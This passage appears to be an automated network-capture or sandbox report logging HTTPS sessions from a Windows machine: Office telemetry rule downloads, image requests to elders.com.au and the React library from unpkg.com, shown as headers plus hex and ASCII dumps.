                                                                                                                                    2024-11-05 08:03:23 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    104192.168.2.44987813.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:23 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 419
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                    ETag: "0x8DC582B9FF95F80"
                                                                                                                                    x-ms-request-id: 6a120a4b-401e-0078-724b-2e4d34000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080323Z-157b9fd754fslm5zhC1SN1s0vn0000000430000000006f3v
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    105192.168.2.44987713.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:23 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 477
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                    ETag: "0x8DC582BA48B5BDD"
                                                                                                                                    x-ms-request-id: 0386ab83-901e-007b-1455-2eac50000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080323Z-157b9fd754frbrzghC1SN12cu4000000041g000000005nr1
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    106192.168.2.44988113.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:23 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 485
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                    ETag: "0x8DC582BB9769355"
                                                                                                                                    x-ms-request-id: 4c090a89-b01e-0098-3360-2ecead000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080323Z-157b9fd754ft96xrhC1SN1efqn000000040g0000000063c1
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:23 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    107192.168.2.449882162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:23 UTC659OUTGET /content/dam/eld/icons---logos/icons/find-expert.png HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:25 UTC696INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Content-Length: 555
                                                                                                                                    Connection: close
                                                                                                                                    last-modified: Tue, 11 Jun 2024 06:29:43 GMT
                                                                                                                                    etag: "0x8DC89DFE156C48F"
                                                                                                                                    content-disposition: attachment; filename="find-expert.png"; filename*=UTF-8''find-expert.png
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-vhost: publish
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-pao-kpao1770025-PAO
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1718122491.698631,VS0,VS0,VE1131
                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b9ab746bec-DFW
                                                                                                                                    2024-11-05 08:03:25 UTC555INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 16 08 06 00 00 00 c4 b4 6c 3b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 01 c0 49 44 41 54 78 01 ed 54 31 56 c2 40 10 9d 59 f2 b4 d3 d8 59 88 2f 3e b0 15 72 02 f5 06 7a 03 3c 81 7a 02 f5 06 7a 02 f0 04 7a 03 f0 04 f8 c0 12 9e fb 84 c2 ce 60 a5 90 dd 71 16 04 36 04 48 2c e8 fc d5 66 e7 ef 9f 99 9d bf 41 48 81 e6 4e fe 48 0b 38 82 94 d0 fd b0 e2 a4 21 92 a0 32 02 7a 90 12 62 cd 01 01 2b c2 bf f0 ea 85 53 b9 22 06 82 1a 20 ca 45 61 b6 e6 e3 9f 85 09 e0 a6 d0 69 5d 27 f1 22 c2 f5 6d cf 63 0f 96 86 59 d9 e4 fe bb 94 56 38 50 1a 4e fd 6e ab 36 de 68 64 73 27 84 58 44 22 a9 06 aa 66
                                                                                                                                    Data Ascii: PNGIHDRl;pHYssRGBgAMAaIDATxT1V@YY/>rz<zzz`q6H,fAHNH8!2zb+S" Eai]'"mcYV8PNn6hds'XD"f


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    108192.168.2.449883162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:23 UTC657OUTGET /content/dam/eld/icons---logos/icons/Livestock.png HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:24 UTC552INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Content-Length: 817
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    last-modified: Tue, 22 Nov 2022 06:53:37 GMT
                                                                                                                                    etag: "331-5ee09a19b9e40"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210130-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730793804.813343,VS0,VS0,VE689
                                                                                                                                    Cache-Control: max-age=86400
                                                                                                                                    CF-Cache-Status: EXPIRED
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b9ba323166-DFW
                                                                                                                                    2024-11-05 08:03:24 UTC817INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 1b 08 06 00 00 00 1d c7 8d 9a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 02 c6 49 44 41 54 78 01 c5 56 4b 52 db 40 10 ed 9e 11 d9 a4 42 b4 4f e1 9a 2a f0 26 0b b0 4e 00 3e 41 e0 04 21 27 80 9c 20 e4 04 e0 13 00 27 80 1b c4 9c c0 c2 2c a1 8a 21 24 55 d9 a1 7c 36 c1 9a e9 74 5b 52 61 1b 64 e4 60 27 af ca fa 78 a6 d5 6f fa 8f 67 b5 fa 16 11 ad 01 60 02 00 27 00 f4 16 10 d6 10 20 4e 6f d3 8d e8 9b b5 1d 63 0c 24 90 44 89 95 3d 53 05 76 6b 8b 97 7c 33 25 eb 09 10 c4 42 48 5e 08 e0 fd ca e7 8b 3d 98 22 14 01 b6 c6 ac 87 85 72 01 12 4d df 02 72 39 ad 2d ee 21 e0 d6 23 7b c5 1a 6d 42
                                                                                                                                    Data Ascii: PNGIHDR pHYssRGBgAMAaIDATxVKR@BO*&N>A!' ',!$U|6t[Rad`'xog`' Noc$D=Svk|3%BH^="rMr9-!#{mB


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    109192.168.2.449884162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:23 UTC784OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:23 UTC587INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"1fe-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-lax-kwhp1940147-LAX
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730212281.434392,VS0,VS0,VE732
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 56970
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ba1a0e6b2e-DFW
                                                                                                                                    2024-11-05 08:03:23 UTC517INData Raw: 31 66 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 32 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 31 34 35 34 20 30 2e 32 32 32 32 31 38 43 31 31 2e 33 36 34 32 20 30 2e 32 32 32 32 31 38 20 31 31 2e 35 38 32 36 20 30 2e 33 30 32 35 36 35 20 31 31 2e 37 34 39 37 20 30 2e 34 36 33 36 37 33 43 31 32 2e 30 38 33 34 20 30 2e 37 38 35 34 37 35 20 31 32 2e 30 38 33 34 20 31 2e 33 30 37 31 32 20 31 31 2e 37 34 39 37 20 31 2e 36 32 38 39 32 4c 32 2e 39 35 32 30 37 20 31 30 2e 31 31 31 32 4c 31 31 2e 37 34 39 37 20 31 38 2e
                                                                                                                                    Data Ascii: 1fe<svg width="12" height="20" viewBox="0 0 12 20" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M11.1454 0.222218C11.3642 0.222218 11.5826 0.302565 11.7497 0.463673C12.0834 0.785475 12.0834 1.30712 11.7497 1.62892L2.95207 10.1112L11.7497 18.
                                                                                                                                    2024-11-05 08:03:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    110192.168.2.449889104.17.247.2034435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC370OUTGET /react@18.3.1/umd/react.development.js HTTP/1.1
                                                                                                                                    Host: unpkg.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:24 UTC576INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    cache-control: public, max-age=31536000
                                                                                                                                    last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                                    etag: W/"1ad6b-kNV4OIuev8g4lblTOp0VuOU34Qg"
                                                                                                                                    via: 1.1 fly.io
                                                                                                                                    fly-request-id: 01JB1FAX2F93CYQ7KRKFYC268G-dfw
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 946084
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53bcbcb26b52-DFW
                                                                                                                                    2024-11-05 08:03:24 UTC793INData Raw: 37 64 36 31 0d 0a 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62
                                                                                                                                    Data Ascii: 7d61/** * @license React * react.development.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(function (glob
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 65 6c 65 6d 65 6e 74 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 50 4f 52 54 41 4c 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 70 6f 72 74 61 6c 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 46 52 41 47 4d 45 4e 54 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 66 72 61 67 6d 65 6e 74 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 53 54 52 49 43 54 5f 4d 4f 44 45 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 73 74 72 69 63 74 5f 6d 6f 64 65 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 50 52 4f 46 49 4c 45 52 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 70 72 6f 66
                                                                                                                                    Data Ascii: Symbol.for('react.element'); var REACT_PORTAL_TYPE = Symbol.for('react.portal'); var REACT_FRAGMENT_TYPE = Symbol.for('react.fragment'); var REACT_STRICT_MODE_TYPE = Symbol.for('react.strict_mode'); var REACT_PROFILER_TYPE = Symbol.for('react.prof
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 20 20 20 2a 20 4b 65 65 70 73 20 74 72 61 63 6b 20 6f 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 62 61 74 63 68 27 73 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 68 6f 77 20 6c 6f 6e 67 20 61 6e 20 75 70 64 61 74 65 0a 20 20 20 2a 20 73 68 6f 75 6c 64 20 73 75 73 70 65 6e 64 20 66 6f 72 20 69 66 20 69 74 20 6e 65 65 64 73 20 74 6f 2e 0a 20 20 20 2a 2f 0a 20 20 76 61 72 20 52 65 61 63 74 43 75 72 72 65 6e 74 42 61 74 63 68 43 6f 6e 66 69 67 20 3d 20 7b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6e 75 6c 6c 0a 20 20 7d 3b 0a 0a 20 20 76 61 72 20 52 65 61 63 74 43 75 72 72 65 6e 74 41 63 74 51 75 65 75 65 20 3d 20 7b 0a 20 20 20 20 63 75 72 72 65 6e 74 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 2f 2f 20 55 73 65 64 20 74 6f 20 72 65
                                                                                                                                    Data Ascii: * Keeps track of the current batch's configuration such as how long an update * should suspend for if it needs to. */ var ReactCurrentBatchConfig = { transition: null }; var ReactCurrentActQueue = { current: null, // Used to re
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 20 20 20 20 76 61 72 20 69 6d 70 6c 20 3d 20 52 65 61 63 74 44 65 62 75 67 43 75 72 72 65 6e 74 46 72 61 6d 65 2e 67 65 74 43 75 72 72 65 6e 74 53 74 61 63 6b 3b 0a 0a 20 20 20 20 20 20 69 66 20 28 69 6d 70 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 73 74 61 63 6b 20 2b 3d 20 69 6d 70 6c 28 29 20 7c 7c 20 27 27 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 74 61 63 6b 3b 0a 20 20 20 20 7d 3b 0a 20 20 7d 0a 0a 20 20 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 20 20 76 61 72 20 65 6e 61 62 6c 65 53 63 6f 70 65 41 50 49 20 3d 20 66 61
                                                                                                                                    Data Ascii: var impl = ReactDebugCurrentFrame.getCurrentStack; if (impl) { stack += impl() || ''; } return stack; }; } // ----------------------------------------------------------------------------- var enableScopeAPI = fa
